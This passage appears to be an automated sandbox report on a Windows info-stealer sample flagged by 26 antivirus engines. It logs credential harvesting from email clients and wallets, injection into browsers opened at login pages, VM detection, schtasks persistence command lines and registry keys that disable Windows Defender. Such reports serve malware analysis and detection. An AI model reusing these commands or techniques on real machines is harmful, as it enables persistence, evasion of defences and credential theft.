RegQueryValueExA Feb. 18, 2024, 10:41 a.m.	key_handle: 0x00000464 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1

Harvests credentials from local email clients (5 events)

file	C:\Users\test22\AppData\Roaming\ICQ\0001
file	C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Network activity contains more than one unique useragent (2 events)

process	reals.exe				useragent	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36
process	iexplore.exe				useragent	Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

One or more non-whitelisted processes were created (13 events)

parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2476 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1092,13381370173561356984,5906995998180378764,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=44B60E9A12F60236E80E7639CF7D58AB --mojo-platform-channel-handle=1128 --ignored=" --type=renderer " /prefetch:2
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e8f1e8,0x7fef3e8f1f8,0x7fef3e8f208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2988 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1068,18386002131428475490,10803167387449053816,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=1E1D777E54CDE3DF3070807EF0AE252A --mojo-platform-channel-handle=1084 --ignored=" --type=renderer " /prefetch:2
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e8f1e8,0x7fef3e8f1f8,0x7fef3e8f208
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Local\Temp\\62878120-c59d-47ae-a254-edf5985ff860.dmp"
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\qxo5wa6x.default-release\minidumps\cb1bf273-8c93-4bdc-acfc-2575ab516bca.dmp"
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2908 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e8f1e8,0x7fef3e8f1f8,0x7fef3e8f208
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com

Found URLs in memory pointing to an IP address rather than a domain (potentially indicative of Command & Control traffic) (1 event)

url	http://127.0.0.1

Appends a known multi-family ransomware file extension to files that have been encrypted (4 events)

file	C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet
file	C:\Users\test22\AppData\Roaming\MultiDoge\multidoge.wallet
file	C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\qxo5wa6x.default-release\parent.lock
file	C:\Users\test22\AppData\Local\Temp\firefox\parent.lock

Resumed a suspended thread in a remote process potentially indicative of process injection (44 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2960 resumed a thread in remote process 3032
Process injection	Process 2960 resumed a thread in remote process 2568
Process injection	Process 2960 resumed a thread in remote process 2904
Process injection	Process 2960 resumed a thread in remote process 936
Process injection	Process 2960 resumed a thread in remote process 3028
Process injection	Process 2960 resumed a thread in remote process 2376
Process injection	Process 3012 resumed a thread in remote process 604
Process injection	Process 1080 resumed a thread in remote process 3032
Process injection	Process 936 resumed a thread in remote process 1864
Process injection	Process 1096 resumed a thread in remote process 2568
Process injection	Process 3028 resumed a thread in remote process 3036
Process injection	Process 2376 resumed a thread in remote process 3112
NtResumeThread Feb. 18, 2024, 10:42 a.m.	thread_handle: 0x000002c0 suspend_count: 1 process_identifier: 3032	1	0	0
NtResumeThread Feb. 18, 2024, 10:42 a.m.	thread_handle: 0x000002c0 suspend_count: 1 process_identifier: 2568	1	0	0
NtResumeThread Feb. 18, 2024, 10:42 a.m.	thread_handle: 0x00000288 suspend_count: 1 process_identifier: 2904	1	0	0
NtResumeThread Feb. 18, 2024, 10:42 a.m.	thread_handle: 0x0000026c suspend_count: 1 process_identifier: 936	1	0	0
NtResumeThread Feb. 18, 2024, 10:42 a.m.	thread_handle: 0x00000214 suspend_count: 1 process_identifier: 3028	1	0	0
NtResumeThread Feb. 18, 2024, 10:42 a.m.	thread_handle: 0x00000284 suspend_count: 1 process_identifier: 2376	1	0	0
NtResumeThread Feb. 18, 2024, 10:41 a.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 604	1	0	0
NtResumeThread Feb. 18, 2024, 10:36 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3032	1	0	0
NtResumeThread Feb. 18, 2024, 10:36 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3032	1	0	0
NtResumeThread Feb. 18, 2024, 10:36 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3032	1	0	0
NtResumeThread Feb. 18, 2024, 10:36 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3032	1	0	0
NtResumeThread Feb. 18, 2024, 10:36 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3032	1	0	0
NtResumeThread Feb. 18, 2024, 10:36 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3032	1	0	0
NtResumeThread Feb. 18, 2024, 10:36 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3032	1	0	0
NtResumeThread Feb. 18, 2024, 10:36 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3032	1	0	0
NtResumeThread Feb. 18, 2024, 10:36 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3032	1	0	0
NtResumeThread Feb. 18, 2024, 10:36 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3032	1	0	0
NtResumeThread Feb. 18, 2024, 10:36 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3032	1	0	0
NtResumeThread Feb. 18, 2024, 10:35 a.m.	thread_handle: 0x0000000000000044 suspend_count: 1 process_identifier: 1864	1	0	0
NtResumeThread Feb. 18, 2024, 10:36 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 2568	1	0	0
NtResumeThread Feb. 18, 2024, 10:36 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 2568	1	0	0
NtResumeThread Feb. 18, 2024, 10:36 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 2568	1	0	0
NtResumeThread Feb. 18, 2024, 10:36 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 2568	1	0	0
NtResumeThread Feb. 18, 2024, 10:36 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 2568	1	0	0
NtResumeThread Feb. 18, 2024, 10:36 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 2568	1	0	0
NtResumeThread Feb. 18, 2024, 10:36 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 2568	1	0	0
NtResumeThread Feb. 18, 2024, 10:36 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 2568	1	0	0
NtResumeThread Feb. 18, 2024, 10:36 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 2568	1	0	0
NtResumeThread Feb. 18, 2024, 10:36 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 2568	1	0	0
NtResumeThread Feb. 18, 2024, 10:36 a.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 2568	1	0	0
NtResumeThread Feb. 18, 2024, 10:35 a.m.	thread_handle: 0x0000000000000044 suspend_count: 1 process_identifier: 3036	1	0	0
NtResumeThread Feb. 18, 2024, 10:35 a.m.	thread_handle: 0x0000000000000044 suspend_count: 1 process_identifier: 3112	1	0	0

Uses Sysinternals tools in order to add additional command line functionality (4 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST

Detects VirtualBox through the presence of a device (1 event)

file	\??\VBoxGuest

Detects VirtualBox through the presence of a registry key (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Detects VMWare through the in instruction feature (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Feb. 18, 2024, 10:42 a.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 57 89 e7 e9 e8 d4 ff ff exception.symbol: mze06txjhuproh7wmldv+0x20020d exception.instruction: in eax, dx exception.module: MZe06TxJhUpRoH7WmLDv.exe exception.exception_code: 0xc0000096 exception.offset: 2097677 exception.address: 0x5d020d registers.esp: 3406452 registers.edi: 8990496 registers.eax: 1447909480 registers.ebp: 3994451988 registers.edx: 22104 registers.ebx: 1969033397 registers.esi: 6078821 registers.ecx: 20	1	0	0

Detects the presence of Wine emulator (1 event)

registry

HKEY_CURRENT_USER\Software\Wine

File has been identified by 26 AntiVirus engines on VirusTotal as malicious (26 events)

Elastic	malicious (high confidence)
Cynet	Malicious (score: 100)
McAfee	Generic-FAWW!FF6BE3E82672
Cylance	unsafe
VIPRE	Gen:Variant.Zusy.537471
BitDefender	Gen:Variant.Ser.Zusy.4878
Cybereason	malicious.f5e5f2
Symantec	ML.Attribute.HighConfidence
APEX	Malicious
Kaspersky	VHO:Trojan.Win32.Tasker.gen
MicroWorld-eScan	Gen:Variant.Ser.Zusy.4878
Emsisoft	Gen:Variant.Ser.Zusy.4878 (B)
Trapmine	malicious.high.ml.score
FireEye	Generic.mg.ff6be3e826728411
Sophos	Generic ML PUA (PUA)
MAX	malware (ai score=84)
Arcabit	Trojan.Ser.Zusy.D130E
ZoneAlarm	VHO:Trojan.Win32.Tasker.gen
GData	Gen:Variant.Ser.Zusy.4878
AhnLab-V3	Trojan/Win.TrojanX-gen.R635207
BitDefenderTheta	Gen:NN.ZexaF.36744.4q3@aqQdLFnk
DeepInstinct	MALICIOUS
VBA32	BScope.Trojan.Packed
Zoner	Probably Heur.ExeHeaderL
SentinelOne	Static AI - Malicious PE
CrowdStrike	win/malicious_confidence_100% (W)

Disables Windows Security features (6 events)

description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection

Executed a process and injected code into it, probably while unpacking (50 out of 175 events)

Time & API	Arguments	Status	Return
NtResumeThread Feb. 18, 2024, 10:41 a.m.	thread_handle: 0x0000011c suspend_count: 1 process_identifier: 2540	1	0
CreateProcessInternalW Feb. 18, 2024, 10:41 a.m.	thread_identifier: 2676 thread_handle: 0x00000148 process_identifier: 2672 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x0000014c	1	1
CreateProcessInternalW Feb. 18, 2024, 10:41 a.m.	thread_identifier: 2760 thread_handle: 0x00000154 process_identifier: 2756 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000150	1	1
CreateProcessInternalW Feb. 18, 2024, 10:41 a.m.	thread_identifier: 2964 thread_handle: 0x00000638 process_identifier: 2960 current_directory: C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE filepath: C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\AbrybdujiWjM8arT4hMa.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\AbrybdujiWjM8arT4hMa.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\AbrybdujiWjM8arT4hMa.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000063c	1	1
CreateProcessInternalW Feb. 18, 2024, 10:42 a.m.	thread_identifier: 2580 thread_handle: 0x000005a0 process_identifier: 2560 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000005ac	1	1
CreateProcessInternalW Feb. 18, 2024, 10:42 a.m.	thread_identifier: 2624 thread_handle: 0x00000628 process_identifier: 2628 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000620	1	1
CreateProcessInternalW Feb. 18, 2024, 10:42 a.m.	thread_identifier: 2776 thread_handle: 0x00000690 process_identifier: 2772 current_directory: C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE filepath: C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\MZe06TxJhUpRoH7WmLDv.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\MZe06TxJhUpRoH7WmLDv.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\MZe06TxJhUpRoH7WmLDv.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000069c	1	1
CreateProcessInternalW Feb. 18, 2024, 10:42 a.m.	thread_identifier: 2300 thread_handle: 0x00000688 process_identifier: 2876 current_directory: C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE filepath: C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\ytII1Y7nWq0uCHYObTuZ.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\ytII1Y7nWq0uCHYObTuZ.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\ytII1Y7nWq0uCHYObTuZ.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000694	1	1
CreateProcessInternalW Feb. 18, 2024, 10:42 a.m.	thread_identifier: 2444 thread_handle: 0x0000068c process_identifier: 2448 current_directory: C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE filepath: C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\K1vNv5KZLmjUpdhligMd.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\K1vNv5KZLmjUpdhligMd.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\K1vNv5KZLmjUpdhligMd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000690	1	1
CreateProcessInternalW Feb. 18, 2024, 10:42 a.m.	thread_identifier: 2508 thread_handle: 0x00000688 process_identifier: 2496 current_directory: C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE filepath: C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\SeRO2Fsg6JF7Eqo2XFxn.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\SeRO2Fsg6JF7Eqo2XFxn.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE\SeRO2Fsg6JF7Eqo2XFxn.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000684	1	1
CreateProcessInternalW Feb. 18, 2024, 10:41 a.m.	thread_identifier: 3016 thread_handle: 0x000001e0 process_identifier: 3012 current_directory: C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE filepath: C:\Program Files (x86)\Internet Explorer\iexplore.exe track: 1 command_line: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome filepath_r: C:\Program Files (x86)\Internet Explorer\iexplore.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000001e4	1	1
NtResumeThread Feb. 18, 2024, 10:42 a.m.	thread_handle: 0x00000260 suspend_count: 1 process_identifier: 2960	1	0
CreateProcessInternalW Feb. 18, 2024, 10:42 a.m.	thread_identifier: 2988 thread_handle: 0x000002c0 process_identifier: 3032 current_directory: C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.youtube.com filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002cc	1	1
NtResumeThread Feb. 18, 2024, 10:42 a.m.	thread_handle: 0x000002c0 suspend_count: 1 process_identifier: 3032	1	0
CreateProcessInternalW Feb. 18, 2024, 10:42 a.m.	thread_identifier: 2476 thread_handle: 0x000002c0 process_identifier: 2568 current_directory: C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002a4	1	1
NtResumeThread Feb. 18, 2024, 10:42 a.m.	thread_handle: 0x000002c0 suspend_count: 1 process_identifier: 2568	1	0
CreateProcessInternalW Feb. 18, 2024, 10:42 a.m.	thread_identifier: 2908 thread_handle: 0x00000288 process_identifier: 2904 current_directory: C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://accounts.google.com filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000218	1	1
NtResumeThread Feb. 18, 2024, 10:42 a.m.	thread_handle: 0x00000288 suspend_count: 1 process_identifier: 2904	1	0
CreateProcessInternalW Feb. 18, 2024, 10:42 a.m.	thread_identifier: 2604 thread_handle: 0x0000026c process_identifier: 936 current_directory: C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE filepath: C:\Program Files\Mozilla Firefox\firefox.exe track: 1 command_line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com filepath_r: C:\Program Files\Mozilla Firefox\firefox.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002c0	1	1
NtResumeThread Feb. 18, 2024, 10:42 a.m.	thread_handle: 0x0000026c suspend_count: 1 process_identifier: 936	1	0
CreateProcessInternalW Feb. 18, 2024, 10:42 a.m.	thread_identifier: 2972 thread_handle: 0x00000214 process_identifier: 3028 current_directory: C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE filepath: C:\Program Files\Mozilla Firefox\firefox.exe track: 1 command_line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video filepath_r: C:\Program Files\Mozilla Firefox\firefox.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000028c	1	1
NtResumeThread Feb. 18, 2024, 10:42 a.m.	thread_handle: 0x00000214 suspend_count: 1 process_identifier: 3028	1	0
CreateProcessInternalW Feb. 18, 2024, 10:42 a.m.	thread_identifier: 2688 thread_handle: 0x00000284 process_identifier: 2376 current_directory: C:\Users\test22\AppData\Local\Temp\heidio0_VbHezP9tE filepath: C:\Program Files\Mozilla Firefox\firefox.exe track: 1 command_line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com filepath_r: C:\Program Files\Mozilla Firefox\firefox.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002dc	1	1
NtResumeThread Feb. 18, 2024, 10:42 a.m.	thread_handle: 0x00000284 suspend_count: 1 process_identifier: 2376	1	0
NtResumeThread Feb. 18, 2024, 10:41 a.m.	thread_handle: 0x00000214 suspend_count: 1 process_identifier: 3012	1	0
CreateProcessInternalW Feb. 18, 2024, 10:41 a.m.	thread_identifier: 812 thread_handle: 0x00000334 process_identifier: 604 current_directory: filepath: track: 1 command_line: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:3012 CREDAT:145409 filepath_r: stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000338	1	1
NtResumeThread Feb. 18, 2024, 10:41 a.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 604	1	0
NtResumeThread Feb. 18, 2024, 10:41 a.m.	thread_handle: 0x00000404 suspend_count: 1 process_identifier: 3012	1	0
NtResumeThread Feb. 18, 2024, 10:42 a.m.	thread_handle: 0x00000290 suspend_count: 1 process_identifier: 3012	1	0
NtGetContextThread Feb. 18, 2024, 10:43 a.m.	thread_handle: 0x000005b8	1	0
NtResumeThread Feb. 18, 2024, 10:41 a.m.	thread_handle: 0x000001f8 suspend_count: 1 process_identifier: 604	1	0
NtResumeThread Feb. 18, 2024, 10:42 a.m.	thread_handle: 0x0000022c suspend_count: 1 process_identifier: 604	1	0
NtResumeThread Feb. 18, 2024, 10:42 a.m.	thread_handle: 0x00000240 suspend_count: 1 process_identifier: 604	1	0
NtResumeThread Feb. 18, 2024, 10:42 a.m.	thread_handle: 0x0000067c suspend_count: 1 process_identifier: 604	1	0
NtResumeThread Feb. 18, 2024, 10:42 a.m.	thread_handle: 0x000001e4 suspend_count: 1 process_identifier: 2772	1	0
